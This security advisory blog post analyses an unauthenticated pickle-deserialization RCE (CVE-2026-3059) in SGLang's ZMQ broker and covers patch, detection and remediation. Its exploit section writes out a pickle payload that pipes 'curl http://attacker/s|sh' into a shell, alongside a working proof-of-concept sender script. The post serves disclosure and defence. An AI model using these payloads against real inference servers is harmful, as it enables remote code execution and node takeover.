CVE Analysis 2026-03-12 · 8 min read

CVE-2026-3059: Unauthenticated RCE in SGLang via ZMQ Pickle Deserialization

SGLang's multimodal ZMQ broker deserializes attacker-controlled data via pickle.loads() with no authentication, enabling unauthenticated RCE against inference servers. CVSS 9.8.

Attack flow (CVE-2026-3059, remote code execution): Attacker (remote, unauthenticated) → Remote code execution (cross-platform, critical) → Code execution (arbitrary code runs as target) → Compromise (full access). No confirmed exploits.

Vulnerability Overview

CVE-2026-3059 is a critical unauthenticated remote code execution vulnerability in SGLang, an open-source LLM serving framework widely deployed in production inference pipelines. The vulnerability exists in the multimodal generation module's inter-process communication layer, which uses ZeroMQ (ZMQ) as a message broker and pickle.loads() to deserialize incoming messages. Because the ZMQ socket binds to a network-accessible endpoint with no authentication or message signing, any network-adjacent or remote attacker who can reach the broker port can execute arbitrary Python code in the context of the inference server process, which typically runs as root or a privileged service account on GPU compute nodes.

Root cause: SGLang's ZMQ broker calls pickle.loads() on raw bytes received from an unauthenticated network socket, allowing an attacker to deliver a malicious pickle payload that executes arbitrary OS commands during deserialization.

Affected Component

The vulnerable code lives in SGLang's multimodal tokenizer/detokenizer worker infrastructure. The relevant files are:

  • python/sglang/srt/managers/image_processor.py — binds the ZMQ PULL socket and calls pickle.loads()
  • python/sglang/srt/managers/tokenizer_manager.py — counterpart PUSH side; same pattern
  • python/sglang/srt/server.py — launches broker workers as subprocesses, inheriting the open socket

The ZMQ broker is instantiated on a tcp:// transport by default in multi-node and disaggregated prefill configurations, making it reachable over the network rather than solely via Unix domain socket.

Root Cause Analysis

The core issue is a textbook unsafe deserialization pattern. The image processor worker loop receives raw ZMQ frames and unconditionally deserializes them:


# python/sglang/srt/managers/image_processor.py
# BUG: recv_pyobj() calls pickle.loads() on the raw frame bytes with no
#      authentication, signature verification, or type allowlisting.

class ImageProcessorWorker:
    def __init__(self, zmq_context, port):
        self.socket = zmq_context.socket(zmq.PULL)
        # BUG: binds to all interfaces on an attacker-reachable port
        self.socket.bind(f"tcp://0.0.0.0:{port}")

    def event_loop(self):
        while True:
            # recv_pyobj() is a thin wrapper around pickle.loads(self.socket.recv())
            # BUG: no HMAC, no allowlist, no type check before deserialization
            obj = self.socket.recv_pyobj()   # <-- arbitrary code execution here
            self._process(obj)

pyzmq documents recv_pyobj() as a convenience wrapper that calls pickle.loads() internally. During unpickling, the REDUCE opcode calls whatever callable the stream names, with whatever arguments the stream supplies; nothing on the receiving side has to opt in. An attacker defines a class whose __reduce__ returns (os.system, ("cmd",)) or equivalent, so that pickling an instance emits exactly such a stream, and OS command execution occurs before any application-level validation can run.

The equivalent C-level call path inside CPython's pickle machinery:


/* Modules/_pickle.c — simplified pseudocode of the dangerous path */
static int
load_reduce(UnpicklerObject *self)
{
    PyObject *callable = NULL;
    PyObject *argtuple  = NULL;

    /* pops callable and args from the internal stack */
    PDATA_POP(self->stack, argtuple);
    PDATA_POP(self->stack, callable);

    // BUG: callable is completely attacker-controlled at this point;
    //      no allowlist check before invocation
    PyObject *result = PyObject_Call(callable, argtuple, NULL);
    ...
}

Because load_reduce executes before the calling application sees the deserialized object, there is no opportunity for SGLang to inspect or reject the payload post-facto.
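Where pickle cannot be removed immediately, the standard library does expose one hook that runs before REDUCE can fire: Unpickler.find_class(), which resolves every global the stream names. The sketch below is a stopgap under stated assumptions, not SGLang's fix. AllowlistUnpickler, ALLOWED_GLOBALS, and restricted_loads are hypothetical names, and the allowlist is deliberately left empty so that only plain containers and scalars load.

```python
import io
import pickle

# Hypothetical allowlist of (module, name) pairs the unpickler may resolve.
# Empty here: dicts, lists, strings, and numbers need no global lookups.
ALLOWED_GLOBALS = frozenset()


class AllowlistUnpickler(pickle.Unpickler):
    """Unpickler that refuses any global not explicitly allowlisted."""

    def find_class(self, module, name):
        # Called whenever the stream resolves a global (GLOBAL / STACK_GLOBAL),
        # which happens before REDUCE can call the resolved object.
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is not allowed")


def restricted_loads(data: bytes):
    """Stand-in for pickle.loads() that enforces the allowlist."""
    return AllowlistUnpickler(io.BytesIO(data)).load()
```

Plain data round-trips through restricted_loads(), while a stream that names any callable raises UnpicklingError before that callable runs. The Python documentation presents this technique as a way to reduce risk rather than eliminate it, so replacing pickle remains the real fix.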

Exploitation Mechanics


EXPLOIT CHAIN — CVE-2026-3059:

1. Attacker identifies target SGLang inference server with multimodal support
   enabled (--enable-multimodal flag or disaggregated prefill config).

2. Port discovery: ZMQ broker port is either default (e.g., base_port+3) or
   leaked via SGLang's /health or /get_server_info HTTP endpoints which
   expose internal topology in some configurations.

3. Attacker constructs malicious pickle payload:
      class Exploit(object):
          def __reduce__(self):
              return (os.system, ("curl http://attacker/s|sh",))
      payload = pickle.dumps(Exploit())

4. Attacker sends payload directly to the ZMQ PULL socket from a
   zmq.PUSH socket; no credentials and no application-level handshake are required:
      ctx  = zmq.Context()
      sock = ctx.socket(zmq.PUSH)
      sock.connect(f"tcp://{target}:{broker_port}")
      sock.send(payload)   # triggers pickle.loads() on target

5. ImageProcessorWorker.event_loop() calls recv_pyobj() -> pickle.loads()
   -> load_reduce() -> PyObject_Call(os.system, ("curl ...|sh",))

6. OS command executes in the inference server process context, typically
   UID 0 inside a container or a high-privilege service account on bare metal.

7. Attacker lands reverse shell; GPU node is now fully compromised.
   Lateral movement to other cluster nodes via shared NFS/model weights
   store or Kubernetes service account token is straightforward.

A minimal proof-of-concept sender (disclosure-safe, no weaponized payload):


#!/usr/bin/env python3
# CVE-2026-3059 — PoC trigger (CypherByte research, no weaponized payload)
import zmq
import pickle
import os
import sys

TARGET  = sys.argv[1]          # e.g. "192.168.1.50"
PORT    = int(sys.argv[2])     # e.g. 30003

class _Probe:
    """Benign probe: writes a canary file to confirm deserialization."""
    def __reduce__(self):
        return (os.system, ("touch /tmp/CVE-2026-3059-pwned",))

ctx  = zmq.Context()
sock = ctx.socket(zmq.PUSH)
sock.connect(f"tcp://{TARGET}:{PORT}")
sock.send(pickle.dumps(_Probe()))
sock.close()
print("[*] payload sent — check /tmp/CVE-2026-3059-pwned on target")

Memory Layout

Because this is a deserialization RCE rather than a memory-corruption primitive, the "memory layout" of interest is the ZMQ frame wire format and the pickle opcode stream. The following shows the on-wire structure of the malicious message:


ZMQ FRAME STRUCTURE (PUSH/PULL, no envelope):
+--------+----------------------------------------------------+
| Offset | Content                                            |
+--------+----------------------------------------------------+
| 0x00   | ZMTP frame header: flags byte + 1- or 8-byte size  |
| +N     | Raw pickle stream (attacker-controlled bytes)      |
+--------+----------------------------------------------------+

PICKLE OPCODE STREAM FOR EXPLOIT PAYLOAD:
Offset  Opcode    Operand
------  --------  ------------------------------------------
0x00    0x80 0x04 PROTO 4        (pickle protocol 4)
0x02    0x95      FRAME          (framing header)
0x03    [8 bytes] frame length
0x0b    0x8c      SHORT_BINUNICODE
0x0c    0x02      length = 2
0x0d    "os"      module name
0x0f    0x8c      SHORT_BINUNICODE
0x10    0x06      length = 6
0x11    "system"  callable name
0x17    0x93      STACK_GLOBAL   <- resolves os.system, pushes onto stack
0x18    0x8c      SHORT_BINUNICODE
0x19    [len]     length of command string
0x1a    "curl http://attacker/s|sh"   <- attacker command
0x??    0x85      TUPLE1         <- pack command into 1-tuple
0x??    0x52      REDUCE         <- calls os.system(cmd) HERE
0x??    0x2e      STOP

No heap grooming, no ASLR bypass, no ROP chain required. The exploit is entirely logic-based: pickle's REDUCE opcode is the primitive, and Python's import system is the gadget chain.
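The opcode table above can be checked against a captured frame without ever loading it. A minimal sketch, assuming the pickle bytes have already been extracted from the ZMQ frame: pickletools.genops() parses the stream without executing it, and the helper reports the opcodes that import or call something. RISKY_OPCODES and risky_opcodes are hypothetical names chosen for this illustration.

```python
import pickletools

# Opcodes that import a global or call/instantiate something during load.
RISKY_OPCODES = frozenset({
    "GLOBAL", "STACK_GLOBAL", "REDUCE",
    "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX", "BUILD",
})


def risky_opcodes(data: bytes) -> list[tuple[int, str]]:
    """Return (offset, opcode name) for each risky opcode, without loading."""
    found = []
    # genops() only parses the opcode stream; it never executes it.
    for opcode, _arg, pos in pickletools.genops(data):
        if opcode.name in RISKY_OPCODES:
            found.append((pos, opcode.name))
    return found
```

A scan like this suits offline triage of captured traffic. It should not be treated as a safe gate in front of pickle.loads(), since an allowlisted-looking stream can still be hostile.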

Patch Analysis

The fix, landed in PR #20904, replaces recv_pyobj() / send_pyobj() calls with a safer serialization scheme. The patch has three components:

1. Replace pickle with msgpack or JSON for IPC messages:


# BEFORE (vulnerable) — python/sglang/srt/managers/image_processor.py:
obj = self.socket.recv_pyobj()   # calls pickle.loads() internally

# AFTER (patched, PR #20904):
raw = self.socket.recv()
obj = msgpack.unpackb(raw, raw=False, strict_map_key=False)
# Only known message types are constructed; no arbitrary code execution path

2. Bind ZMQ sockets to loopback when multi-node transport is not required:


# BEFORE:
self.socket.bind(f"tcp://0.0.0.0:{port}")

# AFTER (patched):
bind_addr = "127.0.0.1" if not config.enable_disaggregated_prefill else "0.0.0.0"
self.socket.bind(f"tcp://{bind_addr}:{port}")
# NOTE: disaggregated prefill still requires network binding — see remediation

3. HMAC authentication for network-facing sockets (defense-in-depth):


# AFTER (patched) — added HMAC verification layer:
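import hmac, hashlib, secrets
import msgpack

BROKER_SECRET = secrets.token_bytes(32)   # generated at server startup

class SecurityError(Exception):
    """Raised when a broker message fails MAC verification."""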

def _send_authenticated(sock, obj):
    payload = msgpack.packb(obj)
    mac     = hmac.new(BROKER_SECRET, payload, hashlib.sha256).digest()
    sock.send_multipart([mac, payload])

def _recv_authenticated(sock):
    mac, payload = sock.recv_multipart()
    expected     = hmac.new(BROKER_SECRET, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(mac, expected):   # constant-time compare
        raise SecurityError("ZMQ broker: MAC verification failed")
    return msgpack.unpackb(payload)
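The property that makes component 1 safe is that the decoder can only ever build message types it already knows about. The sketch below illustrates that idea with the standard-library json module (the patch description allows msgpack or JSON). ImageRequest, MESSAGE_TYPES, decode_message, and the wire layout with "type" and "fields" keys are all assumptions made for this example, not SGLang's actual message schema.

```python
import json
from dataclasses import dataclass


@dataclass(frozen=True)
class ImageRequest:
    """Hypothetical IPC message; the field names are illustrative only."""
    request_id: str
    image_path: str


# Wire-level type tags mapped to the only classes the decoder may build.
MESSAGE_TYPES = {"image_request": ImageRequest}


def decode_message(raw: bytes):
    """Parse bytes as JSON and construct one of the known message types."""
    doc = json.loads(raw.decode("utf-8"))
    if not isinstance(doc, dict):
        raise ValueError("message must be a JSON object")
    tag = doc.get("type")
    if not isinstance(tag, str) or tag not in MESSAGE_TYPES:
        raise ValueError(f"unknown message type: {tag!r}")
    cls = MESSAGE_TYPES[tag]
    fields = doc.get("fields")
    # Require exactly the declared fields, all of them strings.
    if not isinstance(fields, dict) or set(fields) != set(cls.__dataclass_fields__):
        raise ValueError("unexpected or missing fields")
    if not all(isinstance(value, str) for value in fields.values()):
        raise ValueError("all fields must be strings")
    return cls(**fields)
```

Unlike pickle, the sender here chooses only a tag from a fixed table; it never names a callable, so a tag such as "os.system" is simply rejected as unknown.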

Detection and Indicators

Because exploitation leaves minimal OS-level traces until post-exploitation, detection must focus on the network and process layers:


NETWORK INDICATORS:
- Unexpected TCP connections to SGLang ZMQ broker ports (default range:
  base_port+2 through base_port+5, commonly 30002-30005)
- ZMQ PUSH connections originating from hosts not in the serving cluster
- Outbound connections from inference worker PIDs to unknown hosts
  (reverse shell establishment)

PROCESS INDICATORS:
- Child processes spawned by python3/uvicorn workers: sh, bash, curl, wget
  as direct children of SGLang worker PIDs
- /tmp/pip-*, /tmp/*.sh files created by inference server UID

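LINUX AUDITD RULE (load with auditctl from a shell so that $(...) expands;
assumes pgrep matches exactly one worker PID):
auditctl -a always,exit -F arch=b64 -S execve \
   -F ppid=$(pgrep -f image_processor) \
   -k sglang_rce_child_exec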

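SNORT/SURICATA SIGNATURE (pickle REDUCE opcode on ZMQ port):
# Matches PROTO 4 + FRAME, then STACK_GLOBAL (0x93), then REDUCE (0x52).
# The pickle header is not anchored at offset 0 because the ZMTP frame
# header precedes it. Single-byte matches are noisy; tune before alerting.
alert tcp any any -> $SGLANG_HOSTS 30000:30010 ( \
    msg:"CVE-2026-3059 pickle REDUCE opcode on ZMQ broker port"; \
    flow:to_server,established; \
    content:"|80 04 95|"; \
    content:"|93|"; distance:0; \
    content:"|52|"; distance:0; \
    sid:2026305901; rev:1; \
)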
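The process indicators listed above reduce to a simple parent/child check. A minimal sketch, assuming a process snapshot is already available as (pid, ppid, command name) tuples, for example parsed from `ps -eo pid,ppid,comm`: SHELL_TOOLS and suspicious_children are hypothetical names, and the tool list simply mirrors the four binaries named in the indicators.

```python
# Binaries named in the process indicators above.
SHELL_TOOLS = frozenset({"sh", "bash", "curl", "wget"})


def suspicious_children(processes, worker_pids):
    """Return shell/download tools whose direct parent is an SGLang worker.

    processes:   iterable of (pid, ppid, command_name) tuples.
    worker_pids: set of PIDs belonging to SGLang worker processes.
    """
    return [
        (pid, ppid, comm)
        for pid, ppid, comm in processes
        if ppid in worker_pids and comm in SHELL_TOOLS
    ]
```

Only direct children are checked, matching the indicator as written; a payload that double-forks would need a walk over the full ancestry instead.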

Remediation

Immediate mitigations (if patch cannot be applied yet):

  • Firewall ZMQ broker ports at the host and network level. These ports must only be reachable from trusted cluster nodes. Use iptables -A INPUT -p tcp --dport 30000:30010 ! -s <trusted_cidr> -j DROP as a stopgap.
  • If running in Kubernetes, enforce NetworkPolicy to restrict pod-to-pod communication to known SGLang topology peers only.
  • Disable multimodal support (--disable-multimodal) if not required — this removes the vulnerable worker process entirely.
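Firewall rules are easier to reason about when wildcard binds are caught before deployment. The helper below is a hedged sketch of such a configuration check: given a ZMQ endpoint string, it reports whether the bind is reachable beyond loopback. The name is_network_exposed is hypothetical, and the function is not part of SGLang or pyzmq.

```python
import ipaddress


def is_network_exposed(endpoint: str) -> bool:
    """Return True if a ZMQ bind endpoint is reachable beyond loopback."""
    scheme, sep, rest = endpoint.partition("://")
    if not sep:
        raise ValueError(f"not a ZMQ endpoint: {endpoint!r}")
    if scheme in ("ipc", "inproc"):
        return False  # these transports never leave the host
    if scheme != "tcp":
        return True  # unknown network transport: be conservative
    host, _, _port = rest.rpartition(":")
    host = host.strip("[]")  # IPv6 literals are written as [::1]
    if host == "*":
        return True  # ZMQ wildcard: all interfaces
    try:
        return not ipaddress.ip_address(host).is_loopback
    except ValueError:
        # Interface names and hostnames: exposed unless clearly local.
        return host != "localhost"
```

Running a check like this over the configured broker endpoints in CI would flag a tcp://0.0.0.0 bind before it reaches a GPU node.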

Permanent fix: Upgrade to the patched SGLang release that incorporates PR #20904. Verify the fix is present by confirming recv_pyobj() and send_pyobj() do not appear in image_processor.py or tokenizer_manager.py:


$ grep -rn "recv_pyobj\|send_pyobj\|pickle.loads" \
    python/sglang/srt/managers/
# Should produce zero output on patched versions

For disaggregated prefill deployments where the ZMQ socket must bind to a network interface, the patched HMAC layer is the primary control. Ensure BROKER_SECRET is distributed only to trusted peers via a secrets manager (Vault, K8s Secret with restricted RBAC) and never embedded in environment variables visible to untrusted workloads.
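For the HMAC check to pass across nodes, every peer has to hold the same key, so the key must come from shared storage rather than being generated independently by each process. One way to consume a key mounted as a file by a secrets manager is sketched below. The function name load_broker_secret, the file-based delivery, and the 32-byte minimum are assumptions for illustration, not part of the SGLang patch.

```python
import os
import stat

MIN_SECRET_BYTES = 32


def load_broker_secret(path: str) -> bytes:
    """Read the shared HMAC key from a file that only its owner can access."""
    with open(path, "rb") as fh:
        # Check permissions on the open file to avoid a stat/open race.
        mode = stat.S_IMODE(os.fstat(fh.fileno()).st_mode)
        if mode & (stat.S_IRWXG | stat.S_IRWXO):
            raise PermissionError(
                f"{path} is accessible to group/other (mode {oct(mode)})"
            )
        secret = fh.read()
    if len(secret) < MIN_SECRET_BYTES:
        raise ValueError(f"broker secret is shorter than {MIN_SECRET_BYTES} bytes")
    return secret
```

Failing closed on loose permissions or a short key keeps a misconfigured node from silently joining the cluster with a weak or leaked secret.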

CypherByte Research
Mobile security intelligence · cypherbyte.io